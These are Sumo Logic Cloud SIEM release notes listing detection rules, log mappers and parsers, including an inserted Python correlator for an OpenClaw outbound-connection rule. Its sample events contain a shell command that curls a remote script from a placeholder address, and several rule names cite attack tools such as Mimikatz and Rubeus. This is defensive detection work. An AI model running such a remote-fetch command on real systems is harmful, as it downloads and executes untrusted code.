Sumo Logic Cloud SIEM Release Notes


June 12th, 2026 - Content Release

  • This content release includes:
    • Removed redundant field mappings for AWS CloudTrail and updated 40+ AWS CloudTrail rules. srcDevice_ip and device_ip are no longer mapped from the same source field. While out-of-the-box rules have been updated, custom rules that solely reference device_ip as an entity may require adjustments to be properly fed by the updated mappings.
    • 5 new AWS Bedrock security rules detecting RAG poisoning via external S3 data sources, knowledge base mass deletion, IAM privilege escalation targeting Bedrock services, and rapid guardrail intervention attempts indicating jailbreak activity
    • 4 new OpenClaw AI agent monitoring rules providing visibility into shell execution, out-of-band skill injection, child process outbound connections, and unsanctioned installations via network activity
    • 2 new Linux privilege escalation rules detecting exploitation of CVE-2026-31431 (CopyFail), a high-severity kernel vulnerability in the cryptographic subsystem that enables root access
    • Improved entity correlation across 40+ AWS CloudTrail rules through standardized device and source device field mappings
    • New Fortinet authentication log mapping with parser enhancements, and improved user agent extraction for Microsoft Office 365 authentication events
    • Changes are enumerated below

Rules

  • [New] MATCH-S01153 AF_ALG Socket Opened by Unprivileged Process
    • An unprivileged process on a Linux host opened a socket using the kernel cryptographic API subsystem.
  • [New] CHAIN-S00027 OpenClaw - Outbound Connection from Child Process
    • This ordered chain rule triggers when a child process of an openclaw-gateway node process is created on a host followed within 5 minutes by an outbound network connection to an external IP from the same process on the same host, grouped by process ID and hostname. Command lines associated with ip neighbor discovery are excluded as these can be a normal part of OpenClaw operation.
  • [New] MATCH-S01149 OpenClaw - Shell Launch by Gateway
    • This rule triggers when a Node.js process with 'openclaw' in its command line spawns a shell interpreter such as bash, zsh, sh, PowerShell or Python. It monitors process creation events to identify when OpenClaw's shell integration features actively execute system commands. Command lines associated with ip neighbor discovery are excluded as these can be a normal part of OpenClaw operation.
  • [New] MATCH-S01152 OpenClaw - Skill Installed Out-of-Band
    • This rule triggers when a file matching .openclawskills*.md is created by a process whose base image is not "node" (the standard OpenClaw runtime). It monitors Sysmon FileCreate events and flags skill file writes that occur outside the official openclaw or clawhub installer processes.
  • [New] MATCH-S01150 OpenClaw - Activity on Default Port
    • This rule triggers when a WebSocket connection to TCP port 18789 returns the HTTP status 'Switching Protocols', indicating a completed WebSocket handshake. Port 18789 is OpenClaw's default local server port, so this provides detection of active OpenClaw usage.
  • [New] FIRST-S00101 AWS Bedrock - KB Data Source from External S3 Bucket
    • This rule triggers when an S3 bucket from an external AWS account is added to a Bedrock Knowledge Base via an UpdateDataSource or CreateDataSource API call, where that external AWS account has not been observed in the last 90 days.
  • [New] THRESHOLD-S00125 AWS Bedrock - Knowledge Base Mass Deletion
    • This rule triggers when a user deletes multiple AWS Bedrock Knowledge Bases within a short time period from the same source IP address. It monitors CloudTrail logs for successful DeleteKnowledgeBase API calls and excludes AWS service-linked roles.
  • [New] MATCH-S01151 AWS Bedrock - Privileged Permissions Granted
    • This rule triggers when Bedrock IAM permissions are granted through: (1) attachment of managed policies (AmazonBedrockFullAccess, AmazonBedrockStudioFullAccess), (2) creation of policies containing Bedrock actions, or (3) inline policy assignments. It monitors high-risk actions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
  • [New] CHAIN-S00026 AWS Bedrock - Privileged Policy Created and Attached
    • This rule triggers when Bedrock IAM permissions are granted through the creation and attachment of an IAM policy with privileged Bedrock permissions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
  • [New] THRESHOLD-S00124 AWS Bedrock - Rapid Guardrail Interventions
    • This rule triggers when 10 or more Bedrock Guardrail interventions occur within 60 seconds for a user. It monitors CloudWatch logs where stopReason equals 'guardrail_intervened', indicating the guardrail blocked model responses that violated content policies.
  • [New] MATCH-S01154 Unexpected Root Process from Unprivileged Login Session
    • A user executed a program as root on a Linux host while the originating login session belongs to an unprivileged user, which is inconsistent with legitimate privilege escalation workflows.
  • [Updated] MATCH-S00307 AWS - Excessive OAuth Application Permissions Scope
  • [Updated] MATCH-S00306 AWS - New UserPoolClient Created
  • [Updated] MATCH-S00921 AWS Bedrock Model Invocation Logging Configuration Change Observed
  • [Updated] MATCH-S00715 AWS Cloud Storage Deletion
  • [Updated] AGGREGATION-S00002 AWS CloudTrail - Aggressive Reconnaissance
  • [Updated] LEGACY-S00207 AWS CloudTrail - Customer Master Key Disabled or Scheduled for Deletion
  • [Updated] MATCH-S00261 AWS CloudTrail - Database Snapshot Created
  • [Updated] MATCH-S00208 AWS CloudTrail - EC2 Access Key Action Detected
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] MATCH-S00111 AWS CloudTrail - IAM CreateUser Action Observed
  • [Updated] LEGACY-S00206 AWS CloudTrail - IAM Policy Applied
  • [Updated] MATCH-S00101 AWS CloudTrail - IAM Privileged Policy Applied to Group
  • [Updated] MATCH-S00104 AWS CloudTrail - IAM Privileged Policy Applied to Role
  • [Updated] MATCH-S00099 AWS CloudTrail - IAM Privileged Policy Applied to User
  • [Updated] THRESHOLD-S00051 AWS CloudTrail - IAM User Generating AccessDenied Errors Across Multiple Actions
  • [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
  • [Updated] MATCH-S00308 AWS CloudTrail - OpsWorks Describe Permissions Event
  • [Updated] MATCH-S00109 AWS CloudTrail - Permissions Boundary Lifted
  • [Updated] MATCH-S00105 AWS CloudTrail - Public S3 Bucket Exposed
  • [Updated] MATCH-S00213 AWS CloudTrail - Reconnaissance related event
  • [Updated] MATCH-S00096 AWS CloudTrail - Root Console Successful Login Observed
  • [Updated] MATCH-S00764 AWS CloudTrail - S3 Bucket Public Access Block Disabled
  • [Updated] MATCH-S00210 AWS CloudTrail - SQS List Queues Event
  • [Updated] MATCH-S00240 AWS CloudTrail - ScheduleKeyDeletion in KMS
  • [Updated] MATCH-S00247 AWS CloudTrail - Secrets Manager sensitive admin action observed
  • [Updated] MATCH-S00238 AWS CloudTrail - sensitive activity in KMS
  • [Updated] MATCH-S00540 AWS CloudTrail Network Access Control List Deleted
  • [Updated] MATCH-S00664 AWS CloudWatch Alarm Actions Disabled
  • [Updated] MATCH-S00663 AWS CloudWatch Alarm Deletion
  • [Updated] MATCH-S00662 AWS CloudWatch Anomaly Detector Deletion
  • [Updated] MATCH-S00665 AWS CloudWatch Log Group Deletion
  • [Updated] MATCH-S00661 AWS CloudWatch Log Stream Deletion
  • [Updated] MATCH-S00671 AWS Config Recorder Deletion
  • [Updated] MATCH-S00672 AWS Config Recorder Stopped
  • [Updated] MATCH-S00670 AWS Config Service Tampering
  • [Updated] MATCH-S00654 AWS ECS Cluster Deleted
  • [Updated] MATCH-S00716 AWS Image Creation
  • [Updated] MATCH-S00717 AWS Image Deletion
  • [Updated] THRESHOLD-S00106 AWS Image Discovery
  • [Updated] MATCH-S00718 AWS Image Modification
  • [Updated] MATCH-S00719 AWS Instance Creation
  • [Updated] MATCH-S00720 AWS Instance Deletion
  • [Updated] THRESHOLD-S00107 AWS Instance Discovery
  • [Updated] MATCH-S00721 AWS Instance Modification
  • [Updated] MATCH-S00679 AWS Route 53 Domain Registered
  • [Updated] THRESHOLD-S00093 AWS Route 53 Reconnaissance
  • [Updated] MATCH-S00677 AWS Route 53 Service Tampering
  • [Updated] MATCH-S00680 AWS Route 53 TestDNSAnswer
  • [Updated] MATCH-S00678 AWS Route 53 Traffic Policy Creation
  • [Updated] MATCH-S00674 AWS WAF Access Control List Updated
  • [Updated] THRESHOLD-S00092 AWS WAF Reconnaissance
  • [Updated] MATCH-S00676 AWS WAF Rule Group Updated
  • [Updated] MATCH-S00675 AWS WAF Rule Updated
  • [Updated] MATCH-S00673 AWS WAF Service Tampering
  • [Updated] MATCH-S00660 Anomalous AWS User Executed a Command on ECS Container
  • [Updated] MATCH-S00686 Base64 Decode in Command Line
  • [Updated] FIRST-S00085 First Seen Role Creating AWS Bedrock Agent
  • [Updated] MATCH-S00655 New Container Uploaded to AWS ECR
  • [Updated] MATCH-S00826 SSH Keys Added to EC2 Instance
  • [Updated] MATCH-S00281 Windows - PowerShell Process Discovery
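The ordered chain described above for CHAIN-S00027 (gateway child process created, then an outbound connection to an external IP from the same process within 5 minutes, with ip neighbor discovery excluded) can be illustrated with a small correlator over process-create and network-connect events. This is an added example and not Sumo Logic's rule expression; the event field names and the sample events are constructed, and "external" is taken to mean outside RFC 1918, loopback, link-local and CGNAT ranges.

```python
"""Illustrative re-implementation of the CHAIN-S00027 logic described in the
release notes. Not the Cloud SIEM rule itself: field names (host, pid,
parent_cmd, cmd, dst_ip) and the sample events below are constructed."""
import ipaddress
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # second stage must follow within 5 minutes

# Assumption: "external" means not in these internal/special-use ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "100.64.0.0/10", "::1/128", "fc00::/7", "fe80::/10")]

# Constructed sample events, loosely modelled on Sysmon EventID 1
# (process create) and EventID 3 (network connect). All IPs are
# documentation addresses.
SAMPLE_EVENTS = [
    {"ts": "2026-06-12T10:00:00", "type": "process_create", "host": "dev01",
     "pid": 4242, "parent_cmd": "node /opt/openclaw/openclaw-gateway.js",
     "cmd": "/bin/sh -c curl http://198.51.100.7/update.sh"},
    {"ts": "2026-06-12T10:02:30", "type": "network_connect", "host": "dev01",
     "pid": 4242, "dst_ip": "198.51.100.7", "dst_port": 80},
    # Excluded: ip neighbor discovery is a normal part of OpenClaw operation.
    {"ts": "2026-06-12T10:05:00", "type": "process_create", "host": "dev01",
     "pid": 4300, "parent_cmd": "node /opt/openclaw/openclaw-gateway.js",
     "cmd": "ip neighbor show"},
    {"ts": "2026-06-12T10:05:05", "type": "network_connect", "host": "dev01",
     "pid": 4300, "dst_ip": "203.0.113.9", "dst_port": 443},
    # Not external: RFC 1918 destination.
    {"ts": "2026-06-12T10:10:00", "type": "process_create", "host": "dev01",
     "pid": 4400, "parent_cmd": "node /opt/openclaw/openclaw-gateway.js",
     "cmd": "/bin/bash -c ls"},
    {"ts": "2026-06-12T10:10:10", "type": "network_connect", "host": "dev01",
     "pid": 4400, "dst_ip": "10.0.0.5", "dst_port": 22},
    # Outside the 5-minute window: 6 minutes after process creation.
    {"ts": "2026-06-12T11:00:00", "type": "process_create", "host": "dev01",
     "pid": 4500, "parent_cmd": "node /opt/openclaw/openclaw-gateway.js",
     "cmd": "/bin/sh -c whoami"},
    {"ts": "2026-06-12T11:06:00", "type": "network_connect", "host": "dev01",
     "pid": 4500, "dst_ip": "203.0.113.9", "dst_port": 443},
]


def is_external(ip: str) -> bool:
    """True when the address is outside every internal/special-use range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def is_gateway_child(ev: dict) -> bool:
    """First stage: child of an openclaw-gateway node process, excluding
    command lines that perform ip neighbor discovery."""
    parent = ev.get("parent_cmd", "").lower()
    cmd = ev.get("cmd", "").lower()
    return ("openclaw-gateway" in parent and "node" in parent
            and "ip neigh" not in cmd)


def correlate(events: list) -> list:
    """Return one finding per (host, pid) where a qualifying child process
    creation is followed within WINDOW by an outbound connection to an
    external IP from that same process."""
    findings = []
    open_stage = {}  # (host, pid) -> (creation time, command line)
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["pid"])
        t = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "process_create":
            if is_gateway_child(ev):
                open_stage[key] = (t, ev["cmd"])
            else:
                open_stage.pop(key, None)  # PID reuse by a non-qualifying process
        elif ev["type"] == "network_connect" and key in open_stage:
            t0, cmd = open_stage[key]
            delta = t - t0
            if delta > WINDOW:
                open_stage.pop(key)  # first stage expired, chain does not complete
            elif is_external(ev["dst_ip"]):
                findings.append({"host": ev["host"], "pid": ev["pid"], "cmd": cmd,
                                 "dst": f"{ev['dst_ip']}:{ev['dst_port']}",
                                 "delta_s": int(delta.total_seconds())})
                open_stage.pop(key)  # one signal per completed chain
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Only the first pair completes the chain; the ip neighbor child, the RFC 1918 destination, and the connection 6 minutes after creation each fall out at a different stage.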

Log Mappers

  • [New] Fortinet Authentication Logs
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - Trail Change|Logging
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - All Network Events
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - ecs.amazonaws.com - AwsApiCall-ExecuteCommand
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - Policy Change
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey|ScheduleKeyDeletion
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - lambda.amazonaws.com - Audit Change
  • [Updated] CloudTrail - lambda.amazonaws.com - DeleteEventSourceMapping|DeleteFunction
  • [Updated] CloudTrail - lambda.amazonaws.com - DeleteFunctionUrlConfig
  • [Updated] CloudTrail - lambda.amazonaws.com - GetFunction
  • [Updated] CloudTrail - lambda.amazonaws.com - GetLayerVersionPolicy
  • [Updated] CloudTrail - lambda.amazonaws.com - GetPolicy|GetLayerVersionPolicy
  • [Updated] CloudTrail - lambda.amazonaws.com - ListEventSourceMappings
  • [Updated] CloudTrail - lambda.amazonaws.com - ListFunctions
  • [Updated] CloudTrail - lambda.amazonaws.com - Resource Access
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination|DeleteLogGroup|DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - Bucket Change
  • [Updated] CloudTrail - s3.amazonaws.com - GetBucketAcl
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded|RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - All AwsConsoleSignIn events
  • [Updated] CloudTrail - sso.amazonaws.com - Federate|ListProfilesForApplication
  • [Updated] CloudTrail Batch get Partition
  • [Updated] CloudTrail Default Mapping
  • [Updated] Microsoft Office 365 Active Directory Authentication Events

Parsers

  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Microsoft/Office 365

June 4th, 2026 - Content Release

This content release includes:

  • Updated MITRE ATT&CK tactic and technique tags across 89 rules to align with the MITRE ATT&CK v19 framework update, which reorganized the former Defense Evasion tactic into Stealth and the new Defense Impairment tactic
  • Affected rules now reference the correct successor techniques and tactic identifiers, ensuring accurate threat classification in detection workflows
  • Additional changes are enumerated below

Rules

  • [Updated] MATCH-S00307 AWS - Excessive OAuth Application Permissions Scope
  • [Updated] MATCH-S00306 AWS - New UserPoolClient Created
  • [Updated] MATCH-S00261 AWS CloudTrail - Database Snapshot Created
  • [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
  • [Updated] MATCH-S00654 AWS ECS Cluster Deleted
  • [Updated] MATCH-S00719 AWS Instance Creation
  • [Updated] MATCH-S00720 AWS Instance Deletion
  • [Updated] MATCH-S00721 AWS Instance Modification
  • [Updated] MATCH-S00598 Alibaba ActionTrail Logging Configuration Change Observed
  • [Updated] MATCH-S00516 Antivirus Ransomware Detection
  • [Updated] MATCH-S00510 Attempt to Add Certificate to Store
  • [Updated] MATCH-S00390 Attempted Credential Dump From Registry Via Reg.Exe
  • [Updated] MATCH-S00805 Azure - Bastion Host Created/Modified
  • [Updated] MATCH-S00806 Azure - Bastion Host Deleted
  • [Updated] MATCH-S00808 Azure - Container Instance Creation/Modification
  • [Updated] MATCH-S00809 Azure - Container Start
  • [Updated] MATCH-S00786 Azure - SQL Database Export
  • [Updated] MATCH-S00303 Azure - Unauthorized OAuth Application
  • [Updated] MATCH-S00803 Azure - Virtual Machine Creation/Modification
  • [Updated] MATCH-S00804 Azure - Virtual Machine Deleted
  • [Updated] MATCH-S00801 Azure - Virtual Machine Started
  • [Updated] MATCH-S00802 Azure - Virtual Machine Stopped
  • [Updated] MATCH-S00896 Azure Authentication Policy Change
  • [Updated] CHAIN-S00022 Azure DevOps - Agent Pool Created and Deleted within a Short Period
  • [Updated] FIRST-S00099 Azure DevOps - First Seen User Creating Agent Pool
  • [Updated] FIRST-S00092 Azure DevOps - First Seen User Creating Release Pipeline
  • [Updated] FIRST-S00097 Azure DevOps - First Seen User Modifying Build Variables
  • [Updated] FIRST-S00096 Azure DevOps - First Seen User Modifying Release Pipeline
  • [Updated] OUTLIER-S00030 Azure DevOps - Outlier in Pools Deleted Rapidly
  • [Updated] MATCH-S00891 Azure OAUTH Application Consent from User
  • [Updated] MATCH-S00373 BlueMashroom DLL Load
  • [Updated] MATCH-S01155 Claude Compliance API Logging Disabled
  • [Updated] MATCH-S01157 Claude Organization IP Restriction Deleted
  • [Updated] MATCH-S00758 CrashControl Registry Modification
  • [Updated] MATCH-S00544 Disabling Remote User Account Control
  • [Updated] MATCH-S00319 Dridex Process Pattern
  • [Updated] MATCH-S00392 File or Folder Permissions Modifications
  • [Updated] FIRST-S00037 First Seen AWS EKS Admission Controller Created by IP Address
  • [Updated] FIRST-S00020 First Seen Azure OAUTH Application Consent from User
  • [Updated] FIRST-S00030 First Seen Outbound Connection to External IP Address on Port 445 from IP Address
  • [Updated] FIRST-S00034 First Seen Session Token Granted to User from New IP
  • [Updated] FIRST-S00087 First Seen User Creating or Modifying EC2 Launch Template
  • [Updated] MATCH-S00712 GCP Instance Creation
  • [Updated] MATCH-S00713 GCP Instance Deletion
  • [Updated] MATCH-S00714 GCP Instance Modification
  • [Updated] MATCH-S00958 GitHub - PR Review Requirement Removed
  • [Updated] MATCH-S00962 GitHub - Repository Visibility Permissions Changed
  • [Updated] MATCH-S00964 GitHub - SSO Recovery Codes Access Activity
  • [Updated] MATCH-S00966 GitHub - Two-Factor Authentication Disabled for Organization
  • [Updated] MATCH-S00301 Google Workspace - Excessive OAuth Application Permissions Scope
  • [Updated] MATCH-S00227 Google Workspace - Unauthorized OAuth Application
  • [Updated] MATCH-S00894 HAR file creation observed on host
  • [Updated] MATCH-S00850 LastPass - Policy Added
  • [Updated] MATCH-S00851 LastPass - Policy Deleted
  • [Updated] MATCH-S00852 LastPass - Shared Folder Created
  • [Updated] MATCH-S00578 Lsass Registry Key Modified
  • [Updated] MATCH-S00534 MacOS - Re-Opened Applications
  • [Updated] MATCH-S00729 MacOS Gatekeeper Bypass
  • [Updated] MATCH-S00731 MacOS System Integrity Protection Disabled
  • [Updated] MATCH-S00397 Mimikatz Loaded Images Detected
  • [Updated] MATCH-S00404 Mimikatz via Powershell and EventID 4703
  • [Updated] MATCH-S00655 New Container Uploaded to AWS ECR
  • [Updated] MATCH-S00906 Okta - Application Created
  • [Updated] FIRST-S00067 Okta - First Seen Client ID/ASN combo in successful OIDC token grant
  • [Updated] MATCH-S00683 Overly Permissive Chmod Command
  • [Updated] MATCH-S00698 PATH Set to Current Directory
  • [Updated] MATCH-S00704 Persistence Registry Key Modification
  • [Updated] MATCH-S00200 Potential Pass the Hash Activity
  • [Updated] MATCH-S00545 Registry Keys For Creating Shim Databases
  • [Updated] MATCH-S00705 Registry Modification - Authentication Package
  • [Updated] MATCH-S00730 Registry Modification - Code Signing
  • [Updated] MATCH-S00735 Registry Modification - SIP or Trust Provider
  • [Updated] MATCH-S00569 Registry Persistence Mechanisms
  • [Updated] MATCH-S00328 Rubeus Hack Tool
  • [Updated] MATCH-S00498 Rubeus Hack Tool Logon Process Name
  • [Updated] LEGACY-S00094 Self-signed Certificates
  • [Updated] MATCH-S00834 Sensitive Registry Key (WDigest) Edit
  • [Updated] MATCH-S00196 Successful Overpass the Hash Attempt
  • [Updated] LEGACY-S00182 Suspicious HTTP User-Agent
  • [Updated] MATCH-S00135 Suspicious Registry Key Modification
  • [Updated] MATCH-S00886 Suspicious chmod Execution
  • [Updated] MATCH-S00567 Ursnif Malware Registry Key
  • [Updated] MATCH-S00316 WannaCry Ransomware
  • [Updated] MATCH-S00272 Windows - Rogue Domain Controller - dcshadow
  • [Updated] MATCH-S00107 Windows - User Adds Self to Security Group
  • [Updated] LEGACY-S00169 Windows Account Added To Privileged Security Group
  • [Updated] MATCH-S00274 Windows Credential Editor (WCE) Tool Use Detected
  • [Updated] MATCH-S00880 macOS - Entitlement Enumeration via Xattr

May 21st, 2026 - Content Release

  • This content release includes:
    • New support for Anthropic Claude activity logging via the Claude Compliance API, enabling detection and monitoring of administrative actions, Compliance API access, data exports, IP restriction changes, and anomalous resource activity across Claude organizations
    • Six new detection rules targeting administrative abuse and data loss risk: unauthorized API key creation, compliance logging disablement, IP restriction deletion, first-time data exports, and spikes in Compliance API calls or resource deletions
    • New parser and 70+ log mappers for Anthropic Claude Activity Logs to support ingestion and normalization of Claude organization activity data
    • Additional changes are enumerated below

Rules

  • [New] MATCH-S01156 Claude Admin or Platform API Key Created
    • This rule triggers when a new Admin or Platform API key is created within a Claude organization.
  • [New] MATCH-S01155 Claude Compliance API Logging Disabled
    • This rule triggers when an administrator disables Compliance API activity logging for the organization.
  • [New] MATCH-S01157 Claude Organization IP Restriction Deleted
    • This rule triggers when an IP restriction is deleted from a Claude organization, removing a network access control.
  • [New] FIRST-S00102 First Seen User Initiating Claude Data Export
    • This rule triggers the first time a user initiates a Claude organization data export within a 90-day baseline window.
  • [New] OUTLIER-S00034 Outlier in Claude Compliance API Calls from User
    • This rule triggers when the number of Compliance API calls from a single user in a one-hour window exceeds the established baseline by 2 standard deviations with a minimum floor of 15 calls.
  • [New] OUTLIER-S00035 Outlier in Claude Resource Deletions from User
    • This rule triggers when the number of Claude resource deletions (chats, projects, and files) from a single user in a one-hour window exceeds the established baseline by 2 standard deviations with a minimum floor of 5 deletions.
  • [Updated] OUTLIER-S00007 Spike in Windows Administrative Privileges Granted for User
    • This rule has been updated to force case insensitivity in the match expression for user accounts, ensuring more consistent detection of spikes in administrative privileges granted regardless of username casing.

Log Mappers

  • [New] Claude - Admin API Key Events
  • [New] Claude - Authentication Events
  • [New] Claude - account_deleted
  • [New] Claude - api_key_created
  • [New] Claude - claude_artifact_sharing_updated
  • [New] Claude - claude_artifact_viewed
  • [New] Claude - claude_chat_created
  • [New] Claude - claude_chat_deleted
  • [New] Claude - claude_chat_viewed
  • [New] Claude - claude_code_review_config_updated
  • [New] Claude - claude_code_review_repository_added
  • [New] Claude - claude_code_review_repository_removed
  • [New] Claude - claude_code_security_center_config_updated
  • [New] Claude - claude_file_deleted
  • [New] Claude - claude_file_uploaded
  • [New] Claude - claude_file_viewed
  • [New] Claude - claude_organization_settings_updated
  • [New] Claude - claude_project_created
  • [New] Claude - claude_project_deleted
  • [New] Claude - claude_project_sharing_updated
  • [New] Claude - claude_project_viewed
  • [New] Claude - claude_skill_created
  • [New] Claude - claude_user_settings_updated
  • [New] Claude - cli_plugin_exec_policy_updated
  • [New] Claude - compliance_api_accessed
  • [New] Claude - desktop_extension_allowlisted
  • [New] Claude - desktop_extension_blocklisted
  • [New] Claude - desktop_extension_deleted
  • [New] Claude - desktop_extension_removed_from_allowlist
  • [New] Claude - desktop_extension_unblocked
  • [New] Claude - domain_claim_initiated
  • [New] Claude - mcp_server_created
  • [New] Claude - mcp_server_deleted
  • [New] Claude - mcp_server_updated
  • [New] Claude - mcp_tool_policy_updated
  • [New] Claude - org_compliance_api_settings_updated
  • [New] Claude - org_cowork_disabled
  • [New] Claude - org_data_export_completed
  • [New] Claude - org_data_export_started
  • [New] Claude - org_invite_link_disabled
  • [New] Claude - org_invite_link_generated
  • [New] Claude - org_ip_restriction_created
  • [New] Claude - org_ip_restriction_deleted
  • [New] Claude - org_ip_restriction_updated
  • [New] Claude - org_member_invites_disabled
  • [New] Claude - org_member_invites_enabled
  • [New] Claude - org_sso_connection_activated
  • [New] Claude - org_sso_connection_deactivated
  • [New] Claude - org_sso_connection_deleted
  • [New] Claude - org_user_invite_accepted
  • [New] Claude - org_user_invite_sent
  • [New] Claude - platform_api_key_created
  • [New] Claude - platform_federation_issuer_archived
  • [New] Claude - platform_federation_issuer_updated
  • [New] Claude - platform_federation_rule_archived
  • [New] Claude - platform_federation_rule_updated
  • [New] Claude - platform_federation_rule_workspace_added
  • [New] Claude - platform_federation_rule_workspace_removed
  • [New] Claude - platform_file_deleted
  • [New] Claude - platform_file_uploaded
  • [New] Claude - platform_service_account_archived
  • [New] Claude - platform_service_account_updated
  • [New] Claude - platform_workspace_created
  • [New] Claude - platform_workspace_rate_limit_deleted
  • [New] Claude - platform_workspace_rate_limit_updated
  • [New] Claude - role_assignment_granted
  • [New] Claude - tunnel_token_minted
  • [New] Claude - tunnel_token_revoked
  • [New] Claude - user_consent_revoked
  • [New] Claude - user_logged_out
  • [New] Claude Activity Logs - Catch All
  • [Updated] Imperva Incapsula Logs

Parsers

  • [New] /Parsers/System/Anthropic/Claude Activity Logs

May 15th, 2026 - Content Release

  • This content release includes:
    • Removed redundant Cisco Umbrella and Okta field mappings for hosts, and removed the corresponding references from the affected rules
    • New Laurel Linux Audit process start mapper for enhanced Linux process execution visibility
    • AWS WAF parser enhancement to extract cookies
    • Fortinet Fortigate severity mapping fix
    • Changes are enumerated below

Rules

  • [Updated] THRESHOLD-S00016 HTTP Response Error Spike - Internal
  • [Updated] THRESHOLD-S00099 Long URL Containing SQL Commands
  • [Updated] OUTLIER-S00016 Okta - Outlier in OIDC token request failures
  • [Updated] MATCH-S00835 Possible Dynamic URL Domain
  • [Updated] LEGACY-S00182 Suspicious HTTP User-Agent

Log Mappers

  • [New] Laurel Linux Audit - Process Start
  • [Updated] Fortinet UTM IDS1
  • [Updated] Laurel Linux Audit - System Call
  • [Updated] Okta Authentication - auth_via_AD_agent
  • [Updated] Okta Authentication - auth_via_mfa
  • [Updated] Okta Authentication - auth_via_radius
  • [Updated] Okta Authentication - sso
  • [Updated] Okta Authentication Events
  • [Updated] Okta Catch All
  • [Updated] Okta Security Threat Events

Parsers

  • [Updated] /Parsers/System/AWS/AWS WAF
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-CEF

May 4th, 2026 - Content Release

  • This content release includes:
    • Enhanced Fortinet field mappings with standardized severity normalization, session tracking, and device identification across 27 log mappers, plus removal of 3 redundant mappers
    • Windows and Linux Sysmon mapper improvements ensuring normalizedAction and normalizedResource fields are consistently populated across all 44 event types for better query performance and standardization
    • Citrix Cloud C2C parser and mapper updates adding session log support for monitoring user authentication, connection lifecycle, and session state transitions
    • MITRE ATT&CK Tactics & Techniques updated to v19
      • Rule updates corresponding to new and deprecated Tactics & Techniques.
    • Changes are enumerated below

Rules

  • [Updated] MATCH-S00924 AWS Bedrock Guardrail Deleted
  • [Updated] MATCH-S00921 AWS Bedrock Model Invocation Logging Configuration Change Observed
  • [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
  • [Updated] MATCH-S00540 AWS CloudTrail Network Access Control List Deleted
  • [Updated] MATCH-S00664 AWS CloudWatch Alarm Actions Disabled
  • [Updated] MATCH-S00663 AWS CloudWatch Alarm Deletion
  • [Updated] MATCH-S00662 AWS CloudWatch Anomaly Detector Deletion
  • [Updated] MATCH-S00665 AWS CloudWatch Log Group Deletion
  • [Updated] MATCH-S00661 AWS CloudWatch Log Stream Deletion
  • [Updated] MATCH-S00671 AWS Config Recorder Deletion
  • [Updated] MATCH-S00672 AWS Config Recorder Stopped
  • [Updated] MATCH-S00670 AWS Config Service Tampering
  • [Updated] MATCH-S00677 AWS Route 53 Service Tampering
  • [Updated] MATCH-S00674 AWS WAF Access Control List Updated
  • [Updated] MATCH-S00676 AWS WAF Rule Group Updated
  • [Updated] MATCH-S00675 AWS WAF Rule Updated
  • [Updated] MATCH-S00673 AWS WAF Service Tampering
  • [Updated] MATCH-S00598 Alibaba ActionTrail Logging Configuration Change Observed
  • [Updated] MATCH-S00589 Alibaba ActionTrail Network Access Control List Deleted
  • [Updated] MATCH-S00516 Antivirus Ransomware Detection
  • [Updated] MATCH-S00415 Attempt to Clear Windows Event Logs Using Wevtutil
  • [Updated] MATCH-S00795 Azure - Diagnostic Setting Deleted
  • [Updated] MATCH-S00796 Azure - Diagnostic Setting Modified
  • [Updated] MATCH-S00797 Azure - Event Hub Deleted
  • [Updated] MATCH-S00864 Azure Firewall Rule Modified
  • [Updated] MATCH-S00373 BlueMashroom DLL Load
  • [Updated] MATCH-S00388 COMPlus_ETWEnabled Command Line Arguments
  • [Updated] LEGACY-S00037 Fortinet Critical App-Risk
  • [Updated] LEGACY-S00038 Fortinet High App-Risk
  • [Updated] MATCH-S00620 GCP Audit Cloud SQL Database Modified
  • [Updated] MATCH-S00621 GCP Audit GCE Firewall Rule Modified
  • [Updated] MATCH-S00622 GCP Audit GCE Network Route Created or Modified
  • [Updated] MATCH-S00623 GCP Audit GCE VPC Network Modified
  • [Updated] MATCH-S00626 GCP Audit Logging Sink Modified
  • [Updated] MATCH-S00627 GCP Audit Pub/Sub Subscriber Modified
  • [Updated] MATCH-S00628 GCP Audit Pub/Sub Topic Deleted
  • [Updated] MATCH-S00953 GitHub - Audit Logging Modification
  • [Updated] MATCH-S00962 GitHub - Repository Visibility Permissions Changed
  • [Updated] MATCH-S00288 NotPetya Ransomware Activity
  • [Updated] MATCH-S00831 Office 365 Unified Audit Logging Disabled
